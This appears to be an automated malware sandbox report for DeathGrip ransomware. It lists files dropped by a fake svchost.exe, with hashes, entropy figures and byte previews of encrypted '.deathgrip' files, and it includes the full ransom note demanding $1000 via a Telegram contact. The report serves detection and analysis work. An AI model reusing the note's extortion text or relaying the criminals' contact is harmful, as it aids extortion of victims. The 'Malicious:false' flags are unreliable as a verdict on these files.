                                                          Preview:.........l\.A..,y..Ue,.dbZ..#.I..H.....i...l.......z(.l}.tB....."../+..e..E(..D..xq2.J...*.,.G..3.1.......4r..]f,..B.&.A..M....B (...vj...@.V.O.ya.?....J.j.Q.[3..w`&..kL...,]....e.......&.!M..'.>m.Q.b.M.O.7..O..3s.3@.f$.2...7x...(.....lib..l...\......M"O...ce+....I..D....k+Ox....[..u<..Ky.Z_.}.J-\8.j..E......-.]y...z.WL.-........5..).@&aFxz..k.@.s.....i{......n.y.2.o..e}J.0D....}.....e.ucH*.ykGbMsJmJh9bED/bMNf5rmlnTbsz/1R9be9XoP7zC4y0X+wud5Z9X0ZE2oncwM66JNi2D/sZ8j9X4h5WPeb0P6X7rNEhqoDmkY6NzAXlE1szpz0Td8mmZd1zkH2WS5d3YFOkk5Xa1jutNdOk7fzrqaXnu14vxRyeKl8fLfoRn3e95MJcxIeXGCWgbgu8OjCg4NmPaZZ9ymqaJ57K7utlnZKixpQTOmCpyNMD9L8Hpr87AobCLonxM2o+HSzJqd+hgW27dvxt+CxWsXFHMbI+L0AKEqL+Txt8E+JxQZAmgPy7DA08Rcgd1OB3ecFSIKZSBClGJbS5wetOhYCvDeF64g==

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\Anonymous\floodgatecampaigns.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\Anonymous\floodgatecampaigns.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\Anonymous\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10925v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10952v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10952v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.97377340394991
                                                          Encrypted:false
                                                          SSDEEP:192:bM+pa5ctVqZTAUhjEdHFLE4cwPPqI5lIYXaUU0:bkStVqt9E44cwPPqahU0
                                                          MD5:E06F02604B5F6988AEB8590EB10A6D4D
                                                          SHA1:DB8E1743941EC4081856E5B52300D70186B86559
                                                          SHA-256:9EDD23EE8FB179E0CB4F1AF2E81D8E24BAEBC4AEA6F3D34521EC0B32CAADC23E
                                                          SHA-512:2D7D72681C4198BAF8DC93F470343D8A46B01F00498EC8C603C1716084758B6BF081E53AC6BE273CB7B7BD9339DD0217D78013DAD0F1C0F23D0731CC21B884D8
                                                          Malicious:false
                                                          Preview:........K...(.......#~..".....ZLb.D.}..Z.0..q.+.n..0..z...%e....VB..y.)..%.m..q..:L...)..p.........k...b8...:....s....f.._.p[.D.+0...w.x*&..>DWw...W.A..D!..{s...=..Pi.._F.K....p.*...ZW......$....-.bt9;......O.."...mY.....L..}...*n.Y...p...<'..D..En....3...P....b.........#k`E.....?...:.#hP..y.S...K.....91...F..T..M....o..VB..DN.....(.....'.[......1..Y..[0...d....1$=..f.y;.......^..yB..~..!b..y1.....3.W.2.w.....h=\.B.R.3[6..A3;.o0....'.....p.....8mf...W..-.y..L..y...L..1gK...C.&..... e.....b.p..'.9iaC... ..[1..6....>.5.......T..+.?..Y...*..:.<(]lN.iEq.<....v..|.....N.i... ..4hM)_~..w.i;(.....f=...tF.....o.a..cM....ZEpK6..)$.P..i.^[.\......H5...%@.Ckm...;]O..m......R.Z.....d.....*.........Z.3.i.p...>.I....f;..#}pf...&Mpw.....ud...n..;.........Wb..5.....7,)9.....b|8..sx>.g.CM-Y.W ..R$.[..._..K.......q..#3..0R..%\.....#.c..e%.v..h{B,.[<.%..J.3%9.:,;...I....3Q.B..c;Wt....0...K:LLD......u.7.....%............&..K...D...M.?..W... ..6.

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10955v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10955v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11150v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11150v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11154v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11154v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11187v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11187v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3264
                                                          Entropy (8bit):7.922421362941769
                                                          Encrypted:false
                                                          SSDEEP:96:RKjjLu5giZCAPMO2Km2DficjSifBeEll7RP9h:Rmu5pzMOjmTjiZe0XL
                                                          MD5:5A1526BCCE424A13A623C37D0EDC9B8D
                                                          SHA1:28AC29E152F29BED4C3EA5C39653FDA94123F747
                                                          SHA-256:537FFDB5A6BCE4418E1D257C3BC9E5EBEA7AF62337249FF4A5D2757A14F1D001
                                                          SHA-512:556A89B449FE21DDCEE11609872680407D8E8D05AF9DB1E20EC109CDFFAB80DB4FF35D0E151EBBC6750CF9BA40957F1098D0AF714040811E17948E5DC17683C4
                                                          Malicious:false
                                                          Preview:.........V(..........C.{.}j.T...d..._,...}W3....n...B`..5.6.D....9.N.c}.RBg6.!....l...t.o.......p-;"..5.k..r.!....2...B^.V.ZSAfK.....S...1.......,..x{%1......V.y..9q....N..._....B.......d.G.F.....dK.....Im...R..D...G%I..k...\..L..*V.27j.D(.,.s..a.?b...JL.L...S.:..E..W.J.......%.s.c.I4...........>..fZ.m.......).Q..%..jEYUh7...Q...r`m{X. .T.bf....B..EY...B..3...X8..r....1.f....%..y5..:./p..7".`.%.9..PaJ.@>./..Ir..{...:..3..[j..F.j5i...GW.R.A}..)i..1"......c.......\X..%\JJU...y.b....e.V*..c...X.dIL...~....$..Ob.....5....I..C.'n...JT.`...B..D..6..^..2..5.;.P...`|.%. G..g.)n...6..P...p.X.-.4?S....:...*..q..S...*.........h...E...jO."..c...,&_.c...E(?.....>Z.3_99E...SS;...S..z.Q?.....oy8..I..d...Bqq.5o.jf.X...M.8.T;.H.....>..b.X..2.E...../.Q.q.#..C..#>..;.. .0....z.s|............-eo....^.'..:.trUl..o......(.4.$...C@.......X.O..F.........S.5...".5.yH..&...`[.6P.H[H...@........7$...:m..z...,J...`.W42ag............[.g..eF.@..m....*u

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11190v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11190v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1264
                                                          Entropy (8bit):7.711943772069446
                                                          Encrypted:false
                                                          SSDEEP:24:o1HdcoKDWaxIhDq2JD44zcUKTQ/ISIGd0TSRcvOuHbBMIbRRmTFhIEmhUP:nWaxIlqqcYqQ//2SRcvOuHu4yIPK
                                                          MD5:CC8DBBA2AE4E06D68404452A505600FB
                                                          SHA1:30AC70D3F84C99A5361B2CDBA3485DDF1F6A2467
                                                          SHA-256:E3A53D52EBF4B635A2818612E2FFE41AD4C66F0F20CD5C5786F9F31B5F372A71
                                                          SHA-512:3C838FE5007BB457F26A11761D04B153B106AA3D9759B0C3AD6CEAC5B162D636F12A8E9641F4AF84A72C6DF8AAE716ED97EFF0371DA5F1E8290C9AA4B37F2B4E
                                                          Malicious:false
                                                          Preview:.........V(..........C.{.}j.T...d..._,...}W3....n...B`.D.<.e]g.y..7..\..B...}Y....9.;.N.i.".O..n^...m.....@k8,...a.P...RB.d...O.._...mR`4..._..Z9.>...8RM ..g#.......Sq3...q.H...k...z}.3D.o..d&.*...~.`;...^...c......${.. "G..d....%I...c\...ng..t/.....n....g.a"kK~I.^Mo..L.M...3...$..R.'.....)s?.S....,z....j..@.'..k....O.PQ4...m._...`....{4i.$...}...'.O|...\.;ki`.s..&..I...1(Q.I..!....I!..@........u5.4.eur=.I;b.q.....'.*$~.i..~...2..D.....'..#&9..cM|.0.:...[..jI...7r..PX.'.#.}....^h<..*....Z.B....a.e.5}.qW;.E.$.".l6./q)A...5A.a.b7...... .._.bI..s$.nJ.....G..1.bk.P.%...? .9...|1'Q..s.?.}..l2X..Af].S\..gQ7.........=e.....UPRk...~.....E!.......nb..6O..:........!l.p..4#..F.`.....S...+c...s']kB$9....k.. ...r..i1........k.Go,)$....&..........pf.X......cI.....U...o7.'.....^...'....a:.Feo.?L.R.)/...==N...-"[...uv..@.[.Z6....`..B..|..j.u.x.r.7.*1.B...6...(....R..X4....-.....0<..Jn/XB+yy9h/mzqwB6SdmpROq+Aw1CE2C2iUlkiZUvgNubJCuQ5IbHQolyQ8XxCXzRYJozKGkKN4unNVL

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11195v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11195v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11208v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11208v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):848
                                                          Entropy (8bit):7.4570538425480635
                                                          Encrypted:false
                                                          SSDEEP:12:mpf3G9kFop/E+y9FEPV3nam2K237SyGirBi0vRYAMQ+nmtbXdwqJjhf2S1fGZGky:mf3pFF+4F+2t2erUmqFnmNiEdPfGEh
                                                          MD5:386D4F11B869F4BF85638BF41AA32B61
                                                          SHA1:31D8724E72D4708E2C1472777573046C5660CD0A
                                                          SHA-256:25A4C8D08E728D822B1AE879204DE0EBFDABC1B3DFDD26E29AA887BC9F198A59
                                                          SHA-512:1D9724EF9692AF4BC494A69AB56C8A2F611E27EF38D9ADCFED63BF0074EA3A98ED308FA6239725E83E32F9A6B824753C47F9F8D6E1C4EC10091BB2A9CFB43825
                                                          Malicious:false
                                                          Preview:...........>t.m........;...>.Z9..."...o.........r+.~.....R^..T.R......R.x..;U$...RDe...A|.;..2..l.8V~...:*...y.x.'...F.L...=...P7..(.,....^..P..:Z.Sk|.@.. ..~k.....;s.6.DtS...x3.6..C..r../i..w......".. ..F.?>.....&..........l.n.,.G.~.......E..9oy..Zi?..........|......5....KL.VM...F..Oq..j...>.~.......d....<L.4..oE..U.FV0.E...i.+.a.\,....(.5'.z..y6'.~.Y..9.K....YsF..^|w..^..4]...4........Whb....C.}G..S. ..... ..z.5...pDr&...J.4.e.....G^.E.gfF...R....$..w]2n....l.I9..J.....e..o.HLv..2..E8dBUgWQLescBGY1gTl9ehOI8n0UtFy0lzbiLCARs2JcLKIKPJYnxzEllCSTV0jvOPK5Xpl5u7xITc4WcwoRNeeS4o+NJ3OlW473yAbQeWkRoL9H+2IltjYaNVP4AE8q3DuBvjd9ITsJe0UQObS4pXJnGrVTjDm5N7e4HdQu/3WtpEgCnAZxoXexK53CcT57DU5PVFLDlFatbCV5j/rAytd9Vy1mbVyK5Xi2KJZfDfWKZJ3vF+WuZ+1g1WKNn5vX5BCHJhQ48RB5ErMzljYkMBsXncTyyK98S8Pn+SitT7fD0DvEVsz4aWWcKGN451eC70bqKuoVlpP30IF/SJBXQQ==

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11209v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11209v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11210v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11210v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1344
                                                          Entropy (8bit):7.739237046832806
                                                          Encrypted:false
                                                          SSDEEP:24:kTsBusoVB8Db6FHmXIDiZnbFO8l+RtQnSTpjL/WOrGj9FH/5/hd:k4BusoVBGb6lN+Zn5OZRtQSt/SjLH/d
                                                          MD5:3C6447AA56F27C9E3769EEFF82B6FCCD
                                                          SHA1:74F4C0020FDFAC335FBB5D615944E5B70FF940D4
                                                          SHA-256:BE9D0F82CE1EBA168589C959E3AB4375FBB5075B692EDA85EBCC4A37CE70B38A
                                                          SHA-512:0705D7DA00F729F240391B1488882B8EE6EE8A054293AF5E8F7E1D933580010F9994A54841AE7AA911AF362035ABD3C31A5501A8FD33F881646E52B4EC74F276
                                                          Malicious:false
                                                          Preview:................u.6(#]..w^...jdI.g&V.3...X.aW.tl..]..sU?R.m6.2..y.3d...{9.&HAn....u(V....7..f.Yc.r..3....F..H.$...>Y....}.)..v.#..=).......H}.?.s.U..|........2.`./...r..p...=J..rW.w.....Y.7..n.t...[..5RtAd.6.M.^.....Z..!.v_..[..i./.AdX....).o#.` W....kQ...?..t..mN....5.U.h.x.4.'.M~.~.k.[...,_..4...Y.tI...03.]...5...;..RlXo..n..P..Y....X......C.8....76.._.(.=N=/.q......5..2sS.)..T..T$...*..ji...n^.c...+.x..!gu0.N....O......Xr.y..6.W....iA..#T.3rI... .....<k../..fB.4He@0....+[.,....a;u..g....^...v...=.}........R7?.O..g..NJ...........u.$.$....7.....|.............~..g./{u(...........&.....L.;.....C-....Z.J.i...Ra..\..h{...8DbanY..\..4..%..O-7.El.Y.r$Y.9|......@4.Q./....4.7....7Dy.....?.g.;}....E.O{.8.....c.g{....`K}......O7..x.}kX.Z.D...V..k|..'.x.5.Xw....#:..s.)..*o7..A...........h.~.1..A.T.yyN..a.q.O{;....U.w............EO]u..-...v...".^..C."..N}..k..U..T...h}3..^..|.....H...o....j...c...&.u:f...z......S...`..[.. .Ev.....N.A....._

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11264v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
